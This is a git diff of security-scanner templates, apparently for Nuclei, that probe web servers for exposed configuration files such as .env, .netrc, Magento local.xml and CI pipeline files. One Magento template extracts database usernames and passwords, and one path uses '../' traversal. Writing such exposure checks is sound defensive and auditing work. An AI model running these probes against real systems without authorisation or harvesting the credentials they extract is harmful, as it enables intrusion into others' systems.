index 160b2c7e10..7e8097d50c 100644
--- a/exposures/configs/exposed-sharepoint-list.yaml
+++ b/exposures/configs/exposed-sharepoint-list.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://hackerone.com/reports/761158
     - https://hackerone.com/reports/300539
-  tags: config,exposure,sharepoint
+  tags: hackerone,config,exposure,sharepoint
 
 requests:
   - method: GET
diff --git a/exposures/configs/firebase-config-exposure.yaml b/exposures/configs/firebase-config-exposure.yaml
index 47f20788de..ee1b392a04 100644
--- a/exposures/configs/firebase-config-exposure.yaml
+++ b/exposures/configs/firebase-config-exposure.yaml
@@ -3,7 +3,7 @@ id: firebase-config-exposure
 info:
   name: Firebase Config Exposure
   author: geeknik
-  severity: high
+  severity: low
   reference:
     - https://github.com/firebase/firebaseui-web/blob/master/demo/public/sample-config.js
   tags: firebase,exposure,config
diff --git a/exposures/configs/gcloud-config-default.yaml b/exposures/configs/gcloud-config-default.yaml
new file mode 100644
index 0000000000..0b939f2578
--- /dev/null
+++ b/exposures/configs/gcloud-config-default.yaml
@@ -0,0 +1,29 @@
+id: gcloud-config-default
+
+info:
+  name: Google Cloud Config Default
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"access_tokens.db"
+  tags: google,cloud,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/configurations/config_default"
+      - "{{BaseURL}}/.config/gcloud/configurations/config_default"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '[core]'
+          - 'account'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml
index c989e26f47..314985a7fb 100644
--- a/exposures/configs/git-config-nginxoffbyslash.yaml
+++ b/exposures/configs/git-config-nginxoffbyslash.yaml
@@ -1,13 +1,18 @@
 id: git-config-nginxoffbyslash
 
 info:
-  name: Nginx off-by-slash exposes Git config
+  name: Nginx - Git Configuration Exposure
   author: organiccrap
   severity: medium
-  description: Nginx off-by-slash vulnerability exposes Git configuration.
+  description: Nginx is vulnerable to git configuration exposure.
   reference:
+    - https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
     - https://twitter.com/Random_Robbie/status/1262676628167110656
     - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
   tags: config,exposure,nginx
 
 requests:
@@ -29,3 +34,5 @@ requests:
       - type: word
         words:
           - '[core]'
+
+# Enhanced by mp on 2022/07/26
diff --git a/exposures/configs/honeywell-scada-config.yaml b/exposures/configs/honeywell-scada-config.yaml
index e400486a0d..3928f4c6f2 100644
--- a/exposures/configs/honeywell-scada-config.yaml
+++ b/exposures/configs/honeywell-scada-config.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/exploits/44734
-  tags: scada,config,exposure
+  tags: scada,config,exposure,edb
 
 requests:
   - method: GET
diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml
index 13663b4f1e..4d08c3971f 100644
--- a/exposures/configs/javascript-env.yaml
+++ b/exposures/configs/javascript-env.yaml
@@ -25,7 +25,6 @@ requests:
           - 200
 
       - type: dsl
-        part: header
         dsl:
           - "contains(tolower(all_headers), 'content-type: application/javascript')"
 
@@ -49,5 +48,5 @@ requests:
           - "Bootstrap"
           - "jQuery"
           - "CSS TRANSITION SUPPORT"
-        negative: true
         condition: or
+        negative: true
\ No newline at end of file
diff --git a/exposures/configs/joomla-config-file.yaml b/exposures/configs/joomla-config-file.yaml
index 676958e944..ce01415e5f 100644
--- a/exposures/configs/joomla-config-file.yaml
+++ b/exposures/configs/joomla-config-file.yaml
@@ -1,10 +1,10 @@
 id: joomla-config-dist-file
 
 info:
-  name: Joomla Config Dist File
+  name: Joomla! Config Dist File
   author: oppsec
   severity: low
-  description: configuration.php-dist is a file created by Joomla to save Joomla settings.
+  description: configuration.php-dist is a file created by Joomla! to save Joomla settings.
   tags: config,exposure,joomla
 
 requests:
diff --git a/exposures/configs/karma-config-js.yaml b/exposures/configs/karma-config-js.yaml
new file mode 100644
index 0000000000..4205151280
--- /dev/null
+++ b/exposures/configs/karma-config-js.yaml
@@ -0,0 +1,29 @@
+id: karma-conf-js
+
+info:
+  name: Karma Configuration File Exposure
+  author: DhiyaneshDk
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:"karma.conf.js"
+  tags: config,exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.config/karma.conf.js"
+      - "{{BaseURL}}/karma.conf.js"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "// Karma configuration"
+          - "module.exports"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml
index a81e9775ca..6bfbbd7d8e 100644
--- a/exposures/configs/laravel-env.yaml
+++ b/exposures/configs/laravel-env.yaml
@@ -1,12 +1,18 @@
 id: laravel-env
 
 info:
-  name: Laravel .env file accessible
+  name: Laravel - Sensitive Information Disclosure
   author: pxmme1337,dwisiswant0,geeknik,emenalf,adrianmf
-  severity: critical
-  description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
+  severity: high
+  description: |
+    A Laravel .env file was discovered, which stores sensitive information like database credentials and tokens. It should not be publicly accessible.
   reference:
     - https://laravel.com/docs/master/configuration#environment-configuration
+    - https://stackoverflow.com/questions/38331397/how-to-protect-env-file-in-laravel
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: config,exposure,laravel
 
 requests:
@@ -37,6 +43,7 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)="
           - "(?mi)^DB_(HOST|PASSWORD|DATABASE)="
@@ -45,3 +52,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/19
diff --git a/exposures/configs/lvmeng-uts-disclosure.yaml b/exposures/configs/lvmeng-uts-disclosure.yaml
index 0e644455dd..a419728c3a 100644
--- a/exposures/configs/lvmeng-uts-disclosure.yaml
+++ b/exposures/configs/lvmeng-uts-disclosure.yaml
@@ -1,9 +1,10 @@
 id: lvmeng-uts-disclosure
 
 info:
-  name: Lvmeng UTS Disclosure
+  name: Lvmeng - UTS Disclosure
   author: pikpikcu
   severity: high
+  description: Lvmeng UTS was discovered.
   tags: config,exposure
 
 requests:
@@ -30,3 +31,5 @@ requests:
           - "MANAGER_IP"
         condition: and
         part: body
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/magento-config-disclosure.yaml b/exposures/configs/magento-config-disclosure.yaml
new file mode 100644
index 0000000000..e56c67452e
--- /dev/null
+++ b/exposures/configs/magento-config-disclosure.yaml
@@ -0,0 +1,50 @@
+id: magento-config-disclosure
+
+info:
+  name: Magento - Config Disclosure
+  author: ptonewreckin,danigoland,geeknik
+  severity: high
+  description: |
+    Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
+  reference:
+    - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
+  tags: magento,exposure,credential,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/app/etc/local.xml"
+      - "{{BaseURL}}/app/etc/local.xml.additional"
+      - "{{BaseURL}}/store/app/etc/local.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "* Magento"
+          - "<dbname>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
+          - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
+          - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
+          - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
diff --git a/exposures/configs/magento-config.yaml b/exposures/configs/magento-config.yaml
deleted file mode 100644
index 952b58ad80..0000000000
--- a/exposures/configs/magento-config.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: magento-config
-
-info:
-  name: Magento Config Disclosure
-  author: geeknik
-  severity: medium
-  tags: config,exposure,magento
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/app/etc/local.xml"
-      - "{{BaseURL}}/store/app/etc/local.xml"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "text/xml"
-        part: header
-
-      - type: word
-        words:
-          - "Magento"
-        part: body
\ No newline at end of file
diff --git a/exposures/configs/msmtp-config.yaml b/exposures/configs/msmtp-config.yaml
index fb5624b40d..c418d119a8 100644
--- a/exposures/configs/msmtp-config.yaml
+++ b/exposures/configs/msmtp-config.yaml
@@ -1,10 +1,10 @@
 id: msmtp-config
 
 info:
-  name: Msmtp Config Exposure
+  name: Msmtp - Config Exposure
   author: geeknik
   severity: high
-  description: msmtp is a very simple and easy to use SMTP client with fairly complete sendmail compatibility.
+  description: Msmtp configuration was discovered.
   reference:
     - https://wiki.archlinux.org/title/Msmtp
   metadata:
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/nagios-status-page.yaml b/exposures/configs/nagios-status-page.yaml
index 5f78eb24fc..fab2593951 100644
--- a/exposures/configs/nagios-status-page.yaml
+++ b/exposures/configs/nagios-status-page.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6918
-  tags: exposure,nagios,status
+  tags: exposure,nagios,status,edb
 
 requests:
   - method: GET
diff --git a/exposures/configs/netrc.yaml b/exposures/configs/netrc.yaml
index b5b7335645..55d01a34ac 100644
--- a/exposures/configs/netrc.yaml
+++ b/exposures/configs/netrc.yaml
@@ -1,10 +1,10 @@
 id: netrc
 
 info:
-  name: netrc config file
+  name: Netrc - Config File Discovery
   author: geeknik
   severity: high
-  description: The .netrc file contains login and initialization information used by the auto-login process.
+  description: Netrc configuration file was discovered.
   reference:
     - https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html
   tags: netrc,config,exposure
@@ -34,3 +34,5 @@ requests:
         part: body
         regex:
           - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?"
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/oracle-cgi-printenv.yaml b/exposures/configs/oracle-cgi-printenv.yaml
new file mode 100644
index 0000000000..9c23391f7b
--- /dev/null
+++ b/exposures/configs/oracle-cgi-printenv.yaml
@@ -0,0 +1,30 @@
+id: oracle-cgi-printenv
+
+info:
+  name: Oracle CGI printenv - Information Disclosure
+  author: DhiyaneshDk
+  severity: medium
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/OracleCGIPrintEnv.java
+  tags: exposure,oracle,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/printenv"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'DOCUMENT_ROOT="'
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/parameters-config.yaml b/exposures/configs/parameters-config.yaml
new file mode 100644
index 0000000000..e31a1a2423
--- /dev/null
+++ b/exposures/configs/parameters-config.yaml
@@ -0,0 +1,36 @@
+id: parameters-config
+
+info:
+  name: Parameters.yml - File Discovery
+  author: DhiyaneshDK
+  severity: high
+  description: Parameters.yml was discovered.
+  reference: https://www.exploit-db.com/ghdb/5986
+  metadata:
+    verified: true
+    shodan-query: html:"parameters.yml"
+  tags: exposure,cloud,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/parameters.yml"
+      - "{{BaseURL}}/app/config/parameters.yml"
+      - "{{BaseURL}}/parameters.yml.dist"
+      - "{{BaseURL}}/app/config/parameters.yml.dist"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'parameters:'
+          - 'database_user'
+          - 'database_password'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/phalcon-framework-source.yaml b/exposures/configs/phalcon-framework-source.yaml
index 6defaf1e55..01c603877c 100644
--- a/exposures/configs/phalcon-framework-source.yaml
+++ b/exposures/configs/phalcon-framework-source.yaml
@@ -1,9 +1,10 @@
 id: phalcon-framework-source
 
 info:
-  name: Phalcon Framework Source Code leakage
+  name: Phalcon Framework - Source Code Leakage
   author: philippedelteil
   severity: high
+  description: Phalcon Framework source code was discovered.
   tags: exposure,debug,phalcon
 
 requests:
@@ -22,4 +23,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
index de732be701..053e7cb255 100644
--- a/exposures/configs/phpinfo.yaml
+++ b/exposures/configs/phpinfo.yaml
@@ -2,7 +2,11 @@ id: phpinfo-files
 
 info:
   name: phpinfo Disclosure
-  author: pdteam,daffainfo,meme-lord,dhiyaneshDK
+  author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet
+  description: |
+    A "PHP Info" page was found. The output of the phpinfo() command can reveal detailed PHP environment information.
+  remediation: |
+    Remove PHP Info pages from publicly accessible sites, or restrict access to authorized users only.
   severity: low
   tags: config,exposure,phpinfo
 
@@ -27,11 +31,14 @@ requests:
       - "{{BaseURL}}/linusadmin-phpinfo.php"
       - "{{BaseURL}}/php-info.php"
       - "{{BaseURL}}/dashboard/phpinfo.php"
+      - "{{BaseURL}}/_profiler/phpinfo.php"
+      - "{{BaseURL}}/_profiler/phpinfo"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "PHP Extension"
           - "PHP Version"
diff --git a/exposures/configs/phpsec-config.yaml b/exposures/configs/phpsec-config.yaml
new file mode 100644
index 0000000000..75bf61c005
--- /dev/null
+++ b/exposures/configs/phpsec-config.yaml
@@ -0,0 +1,31 @@
+id: phpsec-config
+
+info:
+  name: Phpspec Configuration File Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"phpspec.yml"
+  reference: https://phpspec.net/en/stable/cookbook/configuration.html
+  tags: exposure,phpsec,php,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.phpspec.yml"
+      - "{{BaseURL}}/phpspec.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'suites:'
+          - 'main:'
+          - 'namespace:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/phpstan-config.yaml b/exposures/configs/phpstan-config.yaml
new file mode 100644
index 0000000000..e79f2ce8c6
--- /dev/null
+++ b/exposures/configs/phpstan-config.yaml
@@ -0,0 +1,32 @@
+id: phpstan-config
+
+info:
+  name: PHPStan Configuration Exposure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"phpstan.neon"
+  tags: devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phpstan.neon"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'parameters:'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+          - "application/javascript"
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/pipfile-config.yaml b/exposures/configs/pipfile-config.yaml
new file mode 100644
index 0000000000..bc8e8b2192
--- /dev/null
+++ b/exposures/configs/pipfile-config.yaml
@@ -0,0 +1,28 @@
+id: pipfile-config
+
+info:
+  name: Pipfile Configuration Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Pipfile"
+  tags: exposure,pip,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Pipfile"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '[[source]]'
+          - '[packages]'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/pre-commit-config.yaml b/exposures/configs/pre-commit-config.yaml
new file mode 100644
index 0000000000..715b6b4494
--- /dev/null
+++ b/exposures/configs/pre-commit-config.yaml
@@ -0,0 +1,30 @@
+id: pre-commit-config
+
+info:
+  name: Pre Commit Configuration File Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+  tags: exposure,devops,config,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.pre-commit-config.yaml"
+      - "{{BaseURL}}/pre-commit-config.yaml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "repos:"
+          - "hooks:"
+          - "rev:"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/procfile-config.yaml b/exposures/configs/procfile-config.yaml
new file mode 100644
index 0000000000..0be941bac2
--- /dev/null
+++ b/exposures/configs/procfile-config.yaml
@@ -0,0 +1,26 @@
+id: procfile-config
+
+info:
+  name: Procfile Configuration File Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Procfile"
+  tags: devops,exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Procfile"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - '^web:'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/prometheus-metrics.yaml b/exposures/configs/prometheus-metrics.yaml
index d1c849f628..b98c6d64ed 100644
--- a/exposures/configs/prometheus-metrics.yaml
+++ b/exposures/configs/prometheus-metrics.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://github.com/prometheus/prometheus
     - https://hackerone.com/reports/1026196
-  tags: config,exposure,prometheus
+  tags: exposure,prometheus,hackerone,config
 
 requests:
   - method: GET
diff --git a/exposures/configs/proxy-wpad-exposure.yaml b/exposures/configs/proxy-wpad-exposure.yaml
new file mode 100644
index 0000000000..82d7108188
--- /dev/null
+++ b/exposures/configs/proxy-wpad-exposure.yaml
@@ -0,0 +1,28 @@
+id: proxy-wpad-exposure
+
+info:
+  name: Proxy WPAD Configuration Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"wpad.dat"
+  tags: config,exposure,proxy
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wpad.dat"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "FindProxyForURL"
+          - "url"
+          - "host"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/pubspec-config.yaml b/exposures/configs/pubspec-config.yaml
new file mode 100644
index 0000000000..db1e1043de
--- /dev/null
+++ b/exposures/configs/pubspec-config.yaml
@@ -0,0 +1,31 @@
+id: pubspec-config
+
+info:
+  name: Pubspec YAML Configuration File Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"pubspec.yaml"
+  tags: exposure,devops,pubsec,config,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pubspec.yaml"
+      - "{{BaseURL}}/assets/pubspec.yaml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "version:"
+          - "environment:"
+          - "dependencies:"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/pyproject-toml.yaml b/exposures/configs/pyproject-toml.yaml
new file mode 100644
index 0000000000..59e9c3b940
--- /dev/null
+++ b/exposures/configs/pyproject-toml.yaml
@@ -0,0 +1,31 @@
+id: pyproject-toml
+
+info:
+  name: Pyproject.toml Configuration Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"pyproject.toml"
+  tags: exposure,pyproject,pip,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pyproject.toml"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "[tool.black]"
+          - "exclude ="
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "[tool.poetry]"
+          - "name ="
+        condition: or
diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml
index 95365ba3b6..e96ed52609 100644
--- a/exposures/configs/qdpm-info-leak.yaml
+++ b/exposures/configs/qdpm-info-leak.yaml
@@ -1,13 +1,13 @@
 id: qdpm-info-leak
 
 info:
-  name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
+  name: qdPM 9.2 - DB Credentials Exposure
   author: gy741
   severity: high
-  description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
+  description: qdPM 9.2 database credentials were discovered.
   reference:
     - https://www.exploit-db.com/exploits/50176
-  tags: qdpm,exposure
+  tags: qdpm,exposure,edb
 
 requests:
   - method: GET
@@ -27,3 +27,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/saia-web-server-info.yaml b/exposures/configs/saia-web-server-info.yaml
index c749f4b165..6028fa843a 100644
--- a/exposures/configs/saia-web-server-info.yaml
+++ b/exposures/configs/saia-web-server-info.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6865
-  tags: config,exposure
+  tags: edb,config,exposure
 
 requests:
   - method: GET
diff --git a/exposures/configs/syfmony-profiler.yaml b/exposures/configs/syfmony-profiler.yaml
deleted file mode 100644
index aa0e11aa5d..0000000000
--- a/exposures/configs/syfmony-profiler.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: syfmony-profiler
-
-info:
-  name: SymfonyProfiler information leakage
-  author: wabafet
-  severity: medium
-  tags: config,exposure
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/_profiler/phpinfo.php"
-      - "{{BaseURL}}/_profiler/phpinfo"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "$_SERVER['SERVER_NAME']"
-          - "$_ENV['APP_SECRET']"
-          - "$_ENV['SYMFONY_DOTENV_VARS']"
-        condition: or
-
-      - type: status
-        status:
-          - 200
diff --git a/exposures/configs/symfony-profiler.yaml b/exposures/configs/symfony-profiler.yaml
index 980d14936d..f02bf7c591 100644
--- a/exposures/configs/symfony-profiler.yaml
+++ b/exposures/configs/symfony-profiler.yaml
@@ -4,16 +4,20 @@ info:
   name: Symfony Profiler
   author: pdteam
   severity: high
+  metadata:
+    verified: true
+    shodan-query: http.html:"symfony Profiler"
   tags: config,exposure,symfony
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
+      - "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10"
+
+    stop-at-first-match: true
     matchers:
       - type: word
-        words:
-          - "<title>Symfony Profiler</title>"
-          - "symfony/profiler/"
-        condition: and
         part: body
+        words:
+          - "Symfony Profiler"
diff --git a/exposures/configs/web-config.yaml b/exposures/configs/web-config.yaml
index 7c1e1b7f62..767cbd0315 100644
--- a/exposures/configs/web-config.yaml
+++ b/exposures/configs/web-config.yaml
@@ -2,14 +2,16 @@ id: web-config
 
 info:
   name: Web Config file
-  author: Yash Anand @yashanand155
+  author: Yash Anand @yashanand155,DhiyaneshDK
   severity: info
+  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
   tags: config,exposure
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/web.config'
+      - '{{BaseURL}}/../../web.config'
 
     matchers-condition: and
     matchers:
@@ -21,4 +23,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/exposures/configs/wgetrc-config.yaml b/exposures/configs/wgetrc-config.yaml
new file mode 100644
index 0000000000..038b767fcb
--- /dev/null
+++ b/exposures/configs/wgetrc-config.yaml
@@ -0,0 +1,33 @@
+id: wgetrc-config
+
+info:
+  name: Wgetrc Configuration File Exposure
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:".wgetrc"
+  tags: devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wgetrc"
+      - "{{BaseURL}}/.wgetrc"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '/etc/wgetrc'
+          - 'wget.info'
+
+      - type: word
+        part: header
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/angular-json.yaml b/exposures/files/angular-json.yaml
new file mode 100644
index 0000000000..170f4d6e2a
--- /dev/null
+++ b/exposures/files/angular-json.yaml
@@ -0,0 +1,39 @@
+id: angular-json
+
+info:
+  name: Angular JSON File Exposure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query:
+      - html:"angular.json"
+      - html:"angular-cli.json"
+  tags: exposure,angularjs
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.angular-cli.json"
+      - "{{BaseURL}}/angular-cli.json"
+      - "{{BaseURL}}/angular.json"
+      - "{{BaseURL}}/.angular.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"root":'
+          - '"config":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/appsettings-file-disclosure.yaml b/exposures/files/appsettings-file-disclosure.yaml
new file mode 100644
index 0000000000..2de7615d4a
--- /dev/null
+++ b/exposures/files/appsettings-file-disclosure.yaml
@@ -0,0 +1,33 @@
+id: appsettings-file-disclosure
+
+info:
+  name: Application Setting file disclosure
+  author: DhiyaneshDK,tess
+  severity: high
+  description: |
+    appsetting.json file discloses the DB connection strings containing sensitive information.
+  reference:
+    - https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag
+  metadata:
+    verified: true
+  tags: exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/appsettings.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ConnectionStrings"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/azure-pipelines-exposed.yaml b/exposures/files/azure-pipelines-exposed.yaml
new file mode 100644
index 0000000000..d11cb116ed
--- /dev/null
+++ b/exposures/files/azure-pipelines-exposed.yaml
@@ -0,0 +1,30 @@
+id: azure-pipelines-exposed
+
+info:
+  name: Azure Pipelines Configuration File Disclosure
+  author: DhiyaneshDk
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:"azure-pipelines.yml"
+  tags: config,exposure,azure,microsoft,cloud,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.azure-pipelines.yml"
+      - "{{BaseURL}}/azure-pipelines.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "trigger:"
+          - "pool:"
+          - "variables:"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/bitbucket-pipelines.yaml b/exposures/files/bitbucket-pipelines.yaml
new file mode 100644
index 0000000000..7920872f66
--- /dev/null
+++ b/exposures/files/bitbucket-pipelines.yaml
@@ -0,0 +1,27 @@
+id: bitbucket-pipelines
+
+info:
+  name: BitBucket Pipelines Configuration Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"bitbucket-pipelines.yml"
+  tags: exposure,bitbucket,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bitbucket-pipelines.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'pipelines:'
+          - 'step:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/build-properties.yaml b/exposures/files/build-properties.yaml
new file mode 100644
index 0000000000..099968bd93
--- /dev/null
+++ b/exposures/files/build-properties.yaml
@@ -0,0 +1,30 @@
+id: build-properties
+
+info:
+  name: Build Properties File Exposure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "build.properties"
+  tags: exposure,config
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/build.properties'
+      - '{{BaseURL}}/build/build.properties'
+      - '{{BaseURL}}/manual/style/build.properties'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'manpages.8 = \'
+          - 'manpages.1 = \'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/cloud-config.yaml b/exposures/files/cloud-config.yaml
new file mode 100644
index 0000000000..52d11caa76
--- /dev/null
+++ b/exposures/files/cloud-config.yaml
